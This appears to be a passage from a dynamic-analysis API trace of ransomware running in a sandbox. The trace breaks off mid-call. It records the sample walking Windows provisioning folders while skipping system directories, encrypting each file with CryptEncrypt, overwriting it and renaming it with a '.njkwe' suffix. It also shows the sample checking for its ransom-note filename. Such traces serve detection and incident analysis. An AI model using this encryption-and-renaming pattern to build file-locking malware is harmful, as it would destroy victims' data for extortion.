StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.409] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.410] GetTickCount () returned 0x1153332 [0075.410] GetTickCount () returned 0x1153332 [0075.410] GetTickCount () returned 0x1153332 [0075.410] GetTickCount () returned 0x1153332 [0075.410] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.410] GetProcessHeap () returned 0xbe0000 [0075.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.410] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x1144, lpOverlapped=0x0) returned 1 [0075.412] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffeebc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.412] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x1144, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x1144, lpOverlapped=0x0) returned 1 [0075.412] GetProcessHeap () returned 0xbe0000 [0075.412] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.412] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.412] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.413] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.413] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.413] CloseHandle (hObject=0x434) returned 1 [0075.413] GetProcessHeap () returned 0xbe0000 [0075.413] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.413] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0075.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.414] GetProcessHeap () returned 0xbe0000 [0075.414] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.414] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540c24cc, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x540c24cc, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x540c24cc, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0075.414] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0075.414] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0075.414] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0075.414] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0075.414] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0075.414] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml") returned 100 [0075.414] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0075.414] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.414] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0075.414] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.414] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.415] GetTickCount () returned 0x1153332 [0075.415] GetTickCount () returned 0x1153332 [0075.415] GetTickCount () returned 0x1153332 [0075.415] GetTickCount () returned 0x1153332 [0075.415] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.415] GetProcessHeap () returned 0xbe0000 [0075.415] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.415] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.423] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.423] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.424] GetProcessHeap () returned 0xbe0000 [0075.424] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.424] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.424] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.425] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.425] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.425] CloseHandle (hObject=0x434) returned 1 [0075.425] GetProcessHeap () returned 0xbe0000 [0075.425] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.425] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0075.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.426] GetProcessHeap () returned 0xbe0000 [0075.426] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.426] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0075.426] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0075.426] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0075.426] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0075.426] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0075.426] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0075.426] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov") returned 85 [0075.426] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0075.426] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0075.426] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.426] GetProcessHeap () returned 0xbe0000 [0075.426] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.426] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*") returned 87 [0075.426] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0075.427] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.427] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.427] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.427] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.427] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.427] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\.") returned 87 [0075.427] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.427] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.427] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.427] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.427] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.427] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.427] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.427] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\..") returned 88 [0075.427] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.427] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.427] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0075.427] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0075.427] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0075.427] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0075.427] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0075.427] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0075.427] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime") returned 93 [0075.427] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0075.427] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0075.427] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.427] GetProcessHeap () returned 0xbe0000 [0075.428] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.428] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*") returned 95 [0075.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a320 [0075.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.428] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\.") returned 95 [0075.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.428] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.428] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.428] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.428] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.428] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.428] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.428] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\..") returned 96 [0075.428] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.428] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.429] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54075ff8, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x54075ff8, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5409c262, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x720, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="0__POW~1.PRO")) returned 1 [0075.429] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0075.429] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0075.429] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0075.429] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0075.429] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0075.429] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0075.429] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0075.429] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.429] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0075.429] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.429] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.429] GetTickCount () returned 0x1153341 [0075.429] GetTickCount () returned 0x1153341 [0075.429] GetTickCount () returned 0x1153341 [0075.429] GetTickCount () returned 0x1153341 [0075.429] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.430] GetProcessHeap () returned 0xbe0000 [0075.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.430] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x720, lpOverlapped=0x0) returned 1 [0075.431] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff8e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.431] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x720, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x720, lpOverlapped=0x0) returned 1 [0075.432] GetProcessHeap () returned 0xbe0000 [0075.432] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.432] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.432] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.432] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.432] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.432] CloseHandle (hObject=0x43c) returned 1 [0075.432] GetProcessHeap () returned 0xbe0000 [0075.432] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.432] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0075.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.433] GetProcessHeap () returned 0xbe0000 [0075.433] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.433] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5409c262, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5409c262, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5409c262, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Policy.provxml", cAlternateFileName="1__POW~1.PRO")) returned 1 [0075.433] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Windows") returned -1 [0075.433] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0075.433] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0075.433] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Program Files") returned -1 [0075.433] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0075.433] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: 